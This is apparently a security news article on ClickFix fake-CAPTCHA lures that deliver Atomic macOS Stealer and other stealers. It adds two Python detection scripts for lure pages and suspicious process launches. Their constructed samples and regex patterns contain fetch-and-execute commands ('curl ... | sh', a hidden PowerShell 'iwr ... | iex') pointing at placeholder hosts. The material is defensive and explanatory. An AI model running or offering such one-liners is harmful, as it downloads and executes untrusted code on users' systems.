Cybersecurity experts are warning about a new malware campaign that uses a deceptive tactic called ClickFix to trick Mac users into downloading malicious software known as Atomic macOS Stealer (AMOS).
What makes this campaign particularly dangerous is the use of fake websites that closely mimic well-known companies, such as the American telecommunications provider Spectrum. These spoofed sites look nearly identical to the real ones but are designed to deceive and deliver malware.
Once a victim lands on one of these sites and downloads what appears to be a legitimate app, they receive a malicious script. This script is specifically designed to steal system passwords, bypass Mac security defenses, and download a version of AMOS that subsequently harvests even more private information.
According to the analysis, the script uses macOS-native commands to perform these tasks without raising suspicion. There are signs that the perpetrators may be Russian-speaking cybercriminals, as the malware code includes comments written in Russian.
How the Scam Works: Fake Verification That Installs Malware
It all starts with a website that pretends to be from the internet provider Spectrum. The domain names are nearly identical to the real ones, like panel-spectrum[.]net or spectrum-ticket[.]neto, and it’s easy to fall for them if you’re not paying close attention.
Upon visiting one of these fake sites, users are prompted to complete an hCaptcha verification, allegedly to check the security of their connection. Nothing out of the ordinary—at first glance.
But here’s the trick: after clicking the familiar “I’m not a robot” checkbox, an error message appears saying something like “CAPTCHA verification failed,” suggesting you click a button for an “alternative verification.”
Clicking that button actually copies a malicious command to your clipboard, and the site then provides specific instructions based on your operating system. For example, Windows users are told to open the Run dialog with Windows + R and paste the command. Mac users are guided to open Terminal and run a shell script.
That script is the real trap: it requests your system password (disguised as a normal process), and in the background, it downloads malware called Atomic Stealer, which is designed to steal personal information such as passwords, private files, and even access to your cryptocurrency wallets.
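The lure page described in the steps above has a recognizable shape: a page script that writes to the clipboard, a "verification failed" prompt, OS-specific paste instructions, and a fetch-and-execute command string. The following heuristic checker, written here as an added example and not code from the article or from any of the researchers it cites, scores an HTML document on those four indicators. The regular expressions and the threshold are my own assumptions; the two sample pages are constructed, and the domain in them is a placeholder.

```python
import re
from dataclasses import dataclass, field

# Indicators of a ClickFix-style lure page. Each pattern is a heuristic of my
# own (an assumption), matched case-insensitively against raw HTML/JS text.
CLIPBOARD_WRITE = re.compile(
    r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]\s*\)", re.I)
FAKE_FAILURE = re.compile(r"verification\s+failed|alternative\s+verification", re.I)
PASTE_INSTRUCTIONS = re.compile(
    r"win(dows)?\s*\+\s*r|open\s+(the\s+)?terminal|paste\s+(the\s+)?command", re.I)
FETCH_AND_RUN = re.compile(
    r"curl\b[^\n]*\|\s*(ba)?sh\b|\|\s*iex\b|invoke-expression|\bmshta\b", re.I)

CHECKS = [
    ("clipboard write from page script", CLIPBOARD_WRITE),
    ("fake 'verification failed' prompt", FAKE_FAILURE),
    ("OS-specific paste instructions", PASTE_INSTRUCTIONS),
    ("fetch-and-execute command string", FETCH_AND_RUN),
]

@dataclass
class Verdict:
    score: int = 0
    hits: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # Assumed threshold: three of four indicators together is a strong signal;
        # a real CAPTCHA page normally triggers none of them.
        return self.score >= 3

def assess_page(html: str) -> Verdict:
    """Score an HTML document against the ClickFix indicators."""
    verdict = Verdict()
    for label, pattern in CHECKS:
        if pattern.search(html):
            verdict.hits.append(label)
            verdict.score += 1
    return verdict

# Constructed sample: a page using a genuine hCaptcha widget, no clipboard tricks.
BENIGN_PAGE = """<html><body>
<script src="https://js.hcaptcha.com/1/api.js" async defer></script>
<div class="h-captcha" data-sitekey="placeholder-sitekey"></div>
</body></html>"""

# Constructed sample modelled on the lure described in the article (placeholder host).
LURE_PAGE = """<html><body>
<p>CAPTCHA verification failed. Please use alternative verification.</p>
<button onclick="navigator.clipboard.writeText(cmd)">Verify</button>
<ol><li>Press Windows + R</li><li>Or open Terminal on macOS</li>
<li>Paste the command and press Enter</li></ol>
<script>var cmd = "curl -fsSL https://verify.example.invalid/check.sh | sh";</script>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("benign", BENIGN_PAGE), ("lure", LURE_PAGE)):
        v = assess_page(page)
        print(f"{name}: score={v.score} suspicious={v.suspicious} hits={v.hits}")
```

The checker is meant for triage of URLs reported by users or pulled from proxy logs, not as a blocking control on its own: a legitimate support article that tells readers to open Terminal will match one indicator, which is why the verdict requires several together.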
Interestingly, the site contains several technical flaws and contradictions. For instance, Linux users were shown a PowerShell command (which doesn’t work on Linux), and Mac or Windows users received instructions like “press and hold Windows + R,” which only makes sense on a PC.
These inconsistencies make it clear that the site was hastily put together, likely by attackers aiming to inflict quick damage before their scam was discovered.
All this is happening amid a growing wave of campaigns using the ClickFix tactic—a deceptive method that has become popular for distributing various types of malware. According to experts, those behind these attacks often use the same playbook: highly targeted fake emails (spear phishing), compromised websites that look legitimate, and even reputable platforms like GitHub to distribute their malicious files.
From Fake CAPTCHAs to Malware
The links shared through these methods typically direct users to a fake webpage featuring a CAPTCHA, which appears completely harmless. Everything seems like you're simply verifying that you're human or resolving a minor technical issue. But in reality, the page is crafted to convince you to execute dangerous commands on your system (all in the name of “fixing” a problem that doesn’t actually exist).
And just like that, without knowing it, many users end up playing an active role in their own hacking. It’s a highly effective social engineering trick because it bypasses security controls without exploiting technical vulnerabilities—the user themselves becomes the entry point.
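Because the user, not an exploit, launches the payload, the most reliable place to catch this is endpoint telemetry: an interpreter started from Terminal or from the Windows Run dialog (whose parent is explorer.exe) whose command line fetches remote content and evaluates it. The detection below is an added example, not the article's or any vendor's rule; the process events are constructed, the field names are a simplified form of what an EDR would record (an assumption), and the hosts and URLs are placeholders.

```python
import re

# Parents that indicate a human typed or pasted the command (assumed set):
# macOS terminals, and explorer.exe, which is the parent of Run-dialog launches.
INTERACTIVE_PARENTS = {"terminal", "iterm2", "explorer.exe"}
INTERPRETERS = re.compile(
    r"(^|[\\/])(bash|sh|zsh|powershell(\.exe)?|pwsh(\.exe)?|cmd\.exe)$", re.I)
REMOTE_FETCH = re.compile(
    r"\b(curl|wget)\b|invoke-webrequest|\biwr\b|downloadstring|webclient", re.I)
EVAL_OF_FETCH = re.compile(
    r"\$\(\s*(curl|wget)|\|\s*(ba)?sh\b|\|\s*iex\b|invoke-expression", re.I)
EVASION_FLAGS = re.compile(
    r"-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)\s+bypass|-nop\b", re.I)

def score_event(ev: dict) -> list:
    """Return the list of reasons an event looks like a ClickFix execution."""
    reasons = []
    if ev["parent"].lower() in INTERACTIVE_PARENTS:
        reasons.append("launched from a terminal or the Run dialog")
    if INTERPRETERS.search(ev["image"]):
        reasons.append("shell or script interpreter")
    if REMOTE_FETCH.search(ev["cmdline"]):
        reasons.append("downloads remote content")
    if EVAL_OF_FETCH.search(ev["cmdline"]):
        reasons.append("executes the downloaded content directly")
    if EVASION_FLAGS.search(ev["cmdline"]):
        reasons.append("hidden window / policy bypass flags")
    return reasons

def detect(events) -> list:
    """Alert on events with at least three reasons (assumed threshold)."""
    alerts = []
    for ev in events:
        reasons = score_event(ev)
        if len(reasons) >= 3:
            alerts.append({"host": ev["host"], "cmdline": ev["cmdline"], "reasons": reasons})
    return alerts

# Constructed process-creation events: two mimic the macOS and Windows paths the
# article describes, two are ordinary admin activity that should not alert.
EVENTS = [
    {"host": "mac-01", "parent": "Terminal", "image": "/bin/bash",
     "cmdline": 'bash -c "$(curl -fsSL https://verify.example.invalid/fix.sh)"'},
    {"host": "win-07", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -ep bypass -c "iwr https://verify.example.invalid/fix | iex"'},
    {"host": "mac-02", "parent": "Terminal", "image": "/usr/bin/git",
     "cmdline": "git pull"},
    {"host": "win-03", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell -File C:\\scripts\\backup.ps1"},
]

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert["host"], "->", "; ".join(alert["reasons"]))
```

The rule deliberately keys on the combination (interactive parent, interpreter, remote fetch, direct evaluation) rather than on any one domain or file hash, since the article notes the campaigns reuse the same playbook while swapping the delivery site and the final payload.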
This type of attack, known as ClickFix, has already been detected in multiple parts of the world, including Europe, the Middle East, Africa, and the United States. Although the campaigns vary in form, they all share the same goal: to install malware, whether it be trojans, information stealers, or even ransomware.
In fact, a recent phishing campaign was discovered using fake Booking.com emails, specifically targeting hotels and food businesses. These emails also featured a fake CAPTCHA which, once completed, triggered the download of malware such as XWorm RAT, PureLogs Stealer, or DanaBot. The lure is simple and adaptable—this is why ClickFix is seeing widespread use lately.
And it doesn’t stop there: there have also been versions of this attack that mimic cookie consent banners. Yes, those standard pop-ups that ask you to accept a site’s cookies. In this variation, clicking “Accept” downloads a malicious script, and the site even instructs you to execute it as part of the process to “accept the cookies.”
In summary, what seems like a simple routine action—like clicking “Accept” or verifying a CAPTCHA—can become the gateway for compromising your system.
ClickFix: The Trick That Turns Routine Into a Real Threat
In a case that occurred in April 2025, researchers at Darktrace discovered that a group of attackers—still largely unidentified—was using ClickFix as an entry point to infiltrate foreign systems. Their objective: to gradually gain a foothold within the network, move laterally across connected devices, and exfiltrate system data to an external server using simple web requests—all without triggering any alarms.
ClickFix, as experts explain, is essentially a well-disguised trap. It exploits human error to bypass technical defenses. How? By tricking users into performing actions that seem completely normal but actually allow attackers to walk right through the front door.
It’s not just about a fake CAPTCHA—attackers have also created counterfeit versions of well-known services like Google reCAPTCHA and Cloudflare Turnstile. And they do it so convincingly that, at a glance, they look 100% legitimate. Sometimes, they even inject these fake CAPTCHAs into legitimate websites that have been compromised, making them even harder for the average user to detect.
Through these tactics, attackers manage to deliver highly dangerous malware. This includes information stealers like Lumma and StealC, which harvest credentials and sensitive data, and remote access trojans (RATs) like NetSupport RAT, which allow attackers to control your system remotely.
And the worst part: this works because we’ve become so accustomed to seeing CAPTCHAs and security checks everywhere. As Daniel Kelley from SlashNext points out, many users develop a kind of “verification fatigue”—they click automatically just to keep browsing, without thinking twice about what they’re agreeing to. Attackers know this, and they exploit it to their advantage.